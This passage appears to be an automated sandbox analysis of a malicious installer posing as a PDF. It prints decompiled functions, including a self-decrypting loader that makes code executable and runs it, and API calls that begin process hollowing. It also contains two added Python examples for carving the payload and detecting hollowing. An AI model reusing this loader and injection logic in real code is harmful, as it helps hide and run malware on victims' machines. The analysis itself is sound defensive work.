                                                                                                  • Instruction ID: b057b85792893b74ca80cd052a2a7d490093157c7c3f191d8fc599f6dc27c4b8
                                                                                                  • Opcode Fuzzy Hash: 1b24eb38e2c43651d082d2ada225c5565e7c8f32904bb9a4818c579b6989de34
                                                                                                  • Instruction Fuzzy Hash: 73310A31901219EBDB21CF59DD44EAA3BBCEB403A5B20413AF908B6195D2349E51DB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
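The copy routine decompiled above as E00402F4E, restated as an added Python example so an analyst can carve the same block from an installer image once the sandbox has given the offset. This is not code from the report or from the sample: the function and constant names, the two constructed images, the FailingSink stand-in and the treatment of the unseen helper E00403079 (modelled as returning 0 on success) are all assumptions. The error codes mirror the decompiled push values.

```python
"""Model of the length-prefixed block copy decompiled above as E00402F4E.

Added example, not code from the report or from the sample. It mirrors the
decompiled control flow; names, the sample images and the treatment of the
helper E00403079 (not shown on the page, modelled as returning 0) are
assumptions.
"""
import io
import struct

CHUNK = 0x4000   # copy granularity of the streaming loop (ReadFile size)
ERR_READ = -3    # push 0xfffffffd: ReadFile failed or came back short
ERR_WRITE = -2   # push 0xfffffffe: WriteFile failed or wrote fewer bytes


def read_data_block(inst, db_offset, offset, out=None, outbuf_len=0):
    """Return (count, data); count is bytes copied or ERR_READ / ERR_WRITE.

    inst      seekable stream standing in for the global installer handle
    db_offset base of the data block (the global added to offset on entry)
    offset    negative continues from the current position, as `if (_a4 >= 0)`
    out       destination stream for the streaming path; None selects the
              buffer path, which returns up to outbuf_len bytes as data
    """
    if offset >= 0:
        inst.seek(db_offset + offset)
    hdr = inst.read(4)
    if len(hdr) != 4:                        # `_t35 == 0 || _v8 != 4`
        return ERR_READ, b""
    (length,) = struct.unpack("<i", hdr)     # signed, like the decompiled compares

    if out is None:                          # `_a12 != 0`: caller supplied a buffer
        want = min(length, outbuf_len)       # `if (_t36 >= _a16) _t36 = _a16`
        data = inst.read(max(want, 0))
        return len(data), data               # a short read is returned, not an error

    copied = 0
    while length > 0:                        # `_a4 <= 0` returns 0 straight away
        want = min(length, CHUNK)
        chunk = inst.read(want)
        if len(chunk) != want:               # `== 0 || _t55 != _v8`
            return ERR_READ, b""
        if out.write(chunk) != want:         # `== 0 || _a16 != _t55`
            return ERR_WRITE, b""
        copied += want
        length -= want
    return copied, b""


class FailingSink:
    """Stand-in for an output handle whose WriteFile reports 0 bytes written."""

    def write(self, data):
        return 0


# Constructed images: a 16-byte dummy header, then one length-prefixed block of
# 0x8005 bytes so the streaming loop runs two full chunks plus a 5-byte tail.
DB_OFFSET = 16
PAYLOAD = (bytes(range(256)) * 129)[:0x8005]
SAMPLE_IMAGE = b"\x00" * DB_OFFSET + struct.pack("<i", len(PAYLOAD)) + PAYLOAD
# Header promises 100 bytes but only 50 follow: exercises the ERR_READ path.
TRUNCATED_IMAGE = b"\x00" * DB_OFFSET + struct.pack("<i", 100) + b"A" * 50


def run_demo():
    """Exercise the four outcomes against the constructed images."""
    out = io.BytesIO()
    n_stream, _ = read_data_block(io.BytesIO(SAMPLE_IMAGE), DB_OFFSET, 0, out=out)
    n_buf, head = read_data_block(io.BytesIO(SAMPLE_IMAGE), DB_OFFSET, 0, outbuf_len=16)
    n_trunc, _ = read_data_block(io.BytesIO(TRUNCATED_IMAGE), DB_OFFSET, 0, out=io.BytesIO())
    n_fail, _ = read_data_block(io.BytesIO(SAMPLE_IMAGE), DB_OFFSET, 0, out=FailingSink())
    return {
        "stream_copied": n_stream,
        "stream_matches": out.getvalue() == PAYLOAD,
        "buffer_copied": n_buf,
        "buffer_head": head,
        "truncated": n_trunc,
        "write_failure": n_fail,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value.hex() if isinstance(value, bytes) else value)
```

Feed `read_data_block` a real installer image and the data-block base plus the offset the sandbox reports, and the streaming path writes out exactly what the sample hands to its output file handle; the buffer path is what the stub uses for small in-memory reads.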

                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 1000349F
                                                                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 100034C2
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 100034E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Process$ContextCreateMemoryReadThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2411489757-0
                                                                                                  • Opcode ID: b5614021e3f317e942b0d5079720772f1b177410f7571481354c138ecce27dc6
                                                                                                  • Instruction ID: 08cec40162e0bd9ece182989d3d7ecdd054c29dc5090fd32b361ecfeeb5e1282
                                                                                                  • Opcode Fuzzy Hash: b5614021e3f317e942b0d5079720772f1b177410f7571481354c138ecce27dc6
                                                                                                  • Instruction Fuzzy Hash: 2B322975E40248EEEB61CB94DC45BEEB7B9EF08741F208496E608FA2A0D7715E80DF15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
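The call sequence the report records at 0x10003000 (CreateProcessW, GetThreadContext with 0x10007 = CONTEXT_FULL on x86, then a 4-byte ReadProcessMemory, the size of the image base pointer in a 32-bit PEB) is the front half of process hollowing, the behaviour the signature list flags as "Creates a process in suspended mode" and "Modifies the context of a thread in another process". The following added example, not code from the report or from the sample, checks an API trace per process for that chain as an ordered subsequence, so that it still fires when allocation or unmap calls sit between the stages. The trace format, the later stages beyond the three calls visible here, and the trace lines themselves are assumptions constructed for the demo.

```python
"""Ordered-API-sequence check for the process-hollowing chain.

Added example, not code from the report or from the sample. The function at
0x10003000 shows only the first three calls; the later stages, the trace
format and the sample trace are assumptions constructed for this demo.
"""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004    # dwCreationFlags bit checked at stage 0

# Canonical hollowing order. Other calls (VirtualAllocEx, NtUnmapViewOfSection)
# may sit between stages, so the match is an ordered subsequence, not adjacency.
CHAIN = (
    "CreateProcess",       # target spawned suspended (CreateProcessA/W)
    "GetThreadContext",    # primary thread context; on x86 EBX points at the PEB
    "ReadProcessMemory",   # 4-byte read: the image base out of the PEB
    "WriteProcessMemory",  # payload written into the target
    "SetThreadContext",    # entry point redirected into the payload
    "ResumeThread",        # payload runs under the target's name
)

LINE_RE = re.compile(r"^(\d+)\s+(\w+)(?:\s+(.*))?$")
FLAGS_RE = re.compile(r"flags=0x([0-9a-fA-F]+)")


def parse_trace(text):
    """Group (api, args) tuples per pid in the order they were logged."""
    per_pid = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pid, api, args = m.groups()
            per_pid[int(pid)].append((api, args or ""))
    return per_pid


def match_chain(calls):
    """Number of leading CHAIN stages matched as an ordered subsequence."""
    stage = 0
    for api, args in calls:
        if stage == len(CHAIN):
            break
        if stage == 0:
            m = FLAGS_RE.search(args)
            flags = int(m.group(1), 16) if m else 0
            if api.startswith("CreateProcess") and flags & CREATE_SUSPENDED:
                stage = 1
        elif api == CHAIN[stage]:
            stage += 1
    return stage


def assess(text):
    """Map pid -> (stages matched, verdict)."""
    result = {}
    for pid, calls in parse_trace(text).items():
        stage = match_chain(calls)
        if stage == len(CHAIN):
            verdict = "hollowing"
        elif stage >= 3:            # what the decompiled function alone would show
            verdict = "partial"
        else:
            verdict = "benign"
        result[pid] = (stage, verdict)
    return result


# Constructed trace, one "<pid> <api> [args]" record per line.
TRACE = r"""
2468 CreateProcessW flags=0x00000004 image=C:\Windows\System32\svchost.exe
2468 GetThreadContext flags=0x00010007
2468 ReadProcessMemory size=0x4
2468 VirtualAllocEx prot=0x40
2468 WriteProcessMemory size=0x1c000
2468 SetThreadContext flags=0x00010007
2468 ResumeThread
3001 CreateProcessW flags=0x00000004 image=C:\Windows\System32\cmd.exe
3001 GetThreadContext flags=0x00010007
3001 ReadProcessMemory size=0x4
1337 CreateProcessW flags=0x00000000 image=C:\Windows\System32\notepad.exe
1337 ReadProcessMemory size=0x4
"""

if __name__ == "__main__":
    for pid, (stage, verdict) in sorted(assess(TRACE).items()):
        print(f"pid {pid}: {stage}/{len(CHAIN)} stages -> {verdict}")
```

The "partial" verdict is deliberate: a trace that stops after the three calls visible in this function (suspended create, context read, 4-byte PEB read) is already worth a look, while a CreateProcess without CREATE_SUSPENDED followed by a stray ReadProcessMemory is not.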

                                                                                                   C-Code - Quality: 86%
                                                                                                   			/*
                                                                                                   			 * Directory creation along a path (decompiled; the listing ends before
                                                                                                   			 * the function does). The path is walked one '\\' (0x5c) at a time:
                                                                                                   			 * each separator is overwritten with the byte held in EBX so the prefix
                                                                                                   			 * can be handled on its own, the original character being saved at
                                                                                                   			 * _t33 + 0xb. 0xb7 is ERROR_ALREADY_EXISTS (183); when the create
                                                                                                   			 * helper reports it, GetFileAttributesA is consulted on the existing
                                                                                                   			 * entry. E00402A29, E004058AB, E00405842, E0040554F, E0040556C and
                                                                                                   			 * E004054D2 are helpers not shown on this page.
                                                                                                   			 */
                                                                                                   			E004015B3(char __ebx, void* __eflags) {
                                                                                                   				void* _t13;
                                                                                                   				char _t21;
                                                                                                   				void* _t22;
                                                                                                   				char _t23;
                                                                                                   				signed char _t24;
                                                                                                   				char _t26;
                                                                                                   				CHAR* _t28;
                                                                                                   				void* _t30;
                                                                                                   				char* _t32;
                                                                                                   				void* _t33;
                                                                                                   				intOrPtr _t39;
                                                                                                   
                                                                                                   				_t26 = __ebx;
                                                                                                   				_t28 = E00402A29(0xfffffff0);      // path string operand
                                                                                                   				_t13 = E004058AB(_t28);
                                                                                                   				_t30 = _t13;
                                                                                                   				if(_t13 != __ebx) {
                                                                                                   					do {
                                                                                                   						_t32 = E00405842(_t30, 0x5c);  // next '\\' in the path
                                                                                                   						_t21 =  *_t32;
                                                                                                   						 *_t32 = _t26;                 // cut the path at this separator
                                                                                                   						 *((char*)(_t33 + 0xb)) = _t21; // remember the byte that was there
                                                                                                   						if(_t21 != _t26) {
                                                                                                   							L5:
                                                                                                   							_t22 = E0040554F(_t28);
                                                                                                   						} else {
                                                                                                   							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                   							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040556C(_t39) == 0) {
                                                                                                   								goto L5;
                                                                                                   							} else {
                                                                                                   								_t22 = E004054D2(_t28); // executed
                                                                                                   							}
                                                                                                   						}
                                                                                                   						if(_t22 != _t26) {
                                                                                                   							if(_t22 != 0xb7) {             // anything but ERROR_ALREADY_EXISTS counts as a failure
                                                                                                   								L9:
                                                                                                   								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                   							} else {
                                                                                                   								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                  								if((_t24 & 0x00000010) == 0) {
                                                                                                  									goto L9;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                  						 *_t32 = _t23;
                                                                                                  						_t30 = _t32 + 1;
                                                                                                  					} while (_t23 != _t26);
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                  					_push(0xfffffff5);
                                                                                                  					E00401423();
                                                                                                  				} else {
                                                                                                  					E00401423(0xffffffe6);
                                                                                                  					E00405D24(0x7a8800, _t28);
                                                                                                  					if(SetCurrentDirectoryA(_t28) == 0) {
                                                                                                  						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t33 - 4));
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                    • Part of subcall function 004054D2: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405515
                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,007A8800,00000000,00000000,000000F0), ref: 00401634
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1892508949-0
                                                                                                  • Opcode ID: c3b6f0323b06f0309f06a6fe3ec4e1a9af763d5a6b41c691f20122222a139ed4
                                                                                                  • Instruction ID: f8e787240feab454be01a7155d6319da6ebd6cd518598c0cbf075f0ef46f4e4b
                                                                                                  • Opcode Fuzzy Hash: c3b6f0323b06f0309f06a6fe3ec4e1a9af763d5a6b41c691f20122222a139ed4
                                                                                                  • Instruction Fuzzy Hash: 26112B36908141ABEF217B755D409BF26B0ED92324728463FF492B22D2C63C0942AA2F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 69%
                                                                                                  			E00401389(signed int _a4) {
                                                                                                  				intOrPtr* _t6;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  				signed int _t11;
                                                                                                  				void* _t12;
                                                                                                  				signed int _t16;
                                                                                                  				signed int _t17;
                                                                                                  				void* _t18;
                                                                                                  
                                                                                                  				_t17 = _a4;
                                                                                                  				while(_t17 >= 0) {
                                                                                                  					_t6 = _t17 * 0x1c +  *0x7a27d0;
                                                                                                  					if( *_t6 == 1) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_push(_t6); // executed
                                                                                                  					_t8 = E00401434(); // executed
                                                                                                  					if(_t8 == 0x7fffffff) {
                                                                                                  						return 0x7fffffff;
                                                                                                  					}
                                                                                                  					_t10 = E0040136D(_t8);
                                                                                                  					if(_t10 != 0) {
                                                                                                  						_t11 = _t10 - 1;
                                                                                                  						_t16 = _t17;
                                                                                                  						_t17 = _t11;
                                                                                                  						_t12 = _t11 - _t16;
                                                                                                  					} else {
                                                                                                  						_t12 = _t10 + 1;
                                                                                                  						_t17 = _t17 + 1;
                                                                                                  					}
                                                                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                  						 *0x7a1f8c =  *0x7a1f8c + _t12;
                                                                                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7a1f8c, 0x7530,  *0x7a1f74), 0);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: b365b3dadd465e375f0dd7f41f7d7e4c9c1b290602c44ff93dc5300d219615eb
                                                                                                  • Instruction ID: aea7a8e15c1c7ecce7b0681477f9c6c884b729fab1b64fa4ae005ba0d60f5490
                                                                                                  • Opcode Fuzzy Hash: b365b3dadd465e375f0dd7f41f7d7e4c9c1b290602c44ff93dc5300d219615eb
                                                                                                  • Instruction Fuzzy Hash: 220128326242109FE7095B389C04B6A3698E751359F10823BF951F76F1D77CDC429B4D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004060B4(signed int _a4) {
                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                  				signed int _t10;
                                                                                                  
                                                                                                  				_t10 = _a4 << 3;
                                                                                                  				_t8 =  *(_t10 + 0x409228);
                                                                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x409228));
                                                                                                  				if(_t5 != 0) {
                                                                                                  					L2:
                                                                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40922c));
                                                                                                  				}
                                                                                                  				_t5 = E00406046(_t8); // executed
                                                                                                  				if(_t5 == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				goto L2;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                    • Part of subcall function 00406046: GetSystemDirectoryA.KERNEL32 ref: 0040605D
                                                                                                    • Part of subcall function 00406046: wsprintfA.USER32 ref: 00406096
                                                                                                    • Part of subcall function 00406046: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: 62fccafea54e634e599a9161e1c1cefa8bb4f2fd215621dc62c81c5ca262e862
                                                                                                  • Instruction ID: 94e271bb8baa91334b258b88ca0494c783256dd753a1163dce19aac64b8b6d1e
                                                                                                  • Opcode Fuzzy Hash: 62fccafea54e634e599a9161e1c1cefa8bb4f2fd215621dc62c81c5ca262e862
                                                                                                  • Instruction Fuzzy Hash: 54E08632A4412077D620D6709E0496B72AC9A996503024D7EF916F6181D738DC219669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E004059FB(CHAR* _a4, long _a8, long _a12) {
                                                                                                  				signed int _t5;
                                                                                                  				void* _t6;
                                                                                                  
                                                                                                  				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                  				asm("sbb ecx, ecx");
                                                                                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                  				return _t6;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CE8,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 004059FF
                                                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A21
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: c04a671e1d0aeebb75a90218c505478b62e23a7d0cf6ebbd9f64de51765d29e7
                                                                                                  • Instruction ID: 9ebb41c6164f6193b48f12100262a9f13d4f8789d70c6181de7ffe401b8a7c85
                                                                                                  • Opcode Fuzzy Hash: c04a671e1d0aeebb75a90218c505478b62e23a7d0cf6ebbd9f64de51765d29e7
                                                                                                  • Instruction Fuzzy Hash: BBD09E31658301AFEF098F20DD1AF2E7BA2EB84B00F10962CB686D40E0D6755859DB16
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040554F(CHAR* _a4) {
                                                                                                  				int _t2;
                                                                                                  
                                                                                                  				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                  				if(_t2 == 0) {
                                                                                                  					return GetLastError();
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403262,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405555
                                                                                                  • GetLastError.KERNEL32 ref: 00405563
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                  • Instruction ID: 338e024f856ffae945e6e79b97c519ffde5d29ce176c3d168341a8d267c22b02
                                                                                                  • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                  • Instruction Fuzzy Hash: 24C04C70A58642EBDA119B30DE087177961AB507C1F19C9356106E21A4D6349411D93E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 65%
                                                                                                  			E10001070(void* __ecx) {
                                                                                                  				long _v8;
                                                                                                  				signed char _t4;
                                                                                                  				void* _t8;
                                                                                                  
                                                                                                  				_t4 = 0;
                                                                                                  				do {
                                                                                                  					_t1 =  &E10003118 + _t4; // 0x12cde9
                                                                                                  					asm("ror dl, 0x3");
                                                                                                  					asm("ror dl, 1");
                                                                                                  					asm("rol cl, 0x3");
                                                                                                  					 *( &E10003118 + _t4) = 0x00000078 - _t4 - ( !( *_t1) ^ _t4) + _t4 - 0x00000043 - 0x00000038 ^ 0x0000007a;
                                                                                                  					_t4 = _t4 + 1;
                                                                                                  				} while (_t4 < 0x1a05);
                                                                                                  				VirtualProtect( &E10003118, 0x1a05, 0x40,  &_v8); // executed
                                                                                                  				_t8 = E10003118(); // executed
                                                                                                  				return _t8;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(10003118,00001A05,00000040,?), ref: 100010B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 5fa21ae5415c18b6e1d3592b8c30bc0dfaf392d05b3d176607fa8d90b92c5692
                                                                                                  • Instruction ID: ad33dd3b534e18481b9178e707d484ef5f85e9c7f0ecf63faea97bf4d32801a6
                                                                                                  • Opcode Fuzzy Hash: 5fa21ae5415c18b6e1d3592b8c30bc0dfaf392d05b3d176607fa8d90b92c5692
                                                                                                  • Instruction Fuzzy Hash: 79F0E5245042542FFF4785748CA6BD72B8EC34A3C4F50E0A0E744C32A3D80A124C4692
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004031F5(void* _a4, long _a8) {
                                                                                                  				int _t6;
                                                                                                  				long _t10;
                                                                                                  
                                                                                                  				_t10 = _a8;
                                                                                                  				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                                                  				if(_t6 == 0 || _a8 != _t10) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00791940,00789940,004030FA,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000), ref: 0040320C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                  • Instruction ID: 344e7d9ad7bcffc728ac4804aceab3062a7c255e83d517d9652c3ef582d27c82
                                                                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                  • Instruction Fuzzy Hash: C0E08631500118BBCF209E51AD00EA73B9CDB05362F00C477F904E5190D131DA109BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403227(long _a4) {
                                                                                                  				long _t2;
                                                                                                  
                                                                                                  				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                                                  				return _t2;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402ED3,?), ref: 00403235
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
Uniqueness
• Uniqueness Score: -1.00%
C-Code - Quality: 100%
// Scan a NUL-terminated string for the first byte equal to _a8 and return a pointer to
// it (or to the terminating NUL). CharNextA steps over whole DBCS characters, so a
// multi-byte lead byte is never matched half-way. This is a generic string helper; the
// string on the stack at the recorded call (see APIs below) is the sample's own path,
// i.e. it ran while the stub parsed its command line, not inside the unpacked payload.
E00405842(CHAR* _a4, intOrPtr _a8) {
	CHAR* _t3;
	char _t4;

	_t3 = _a4;
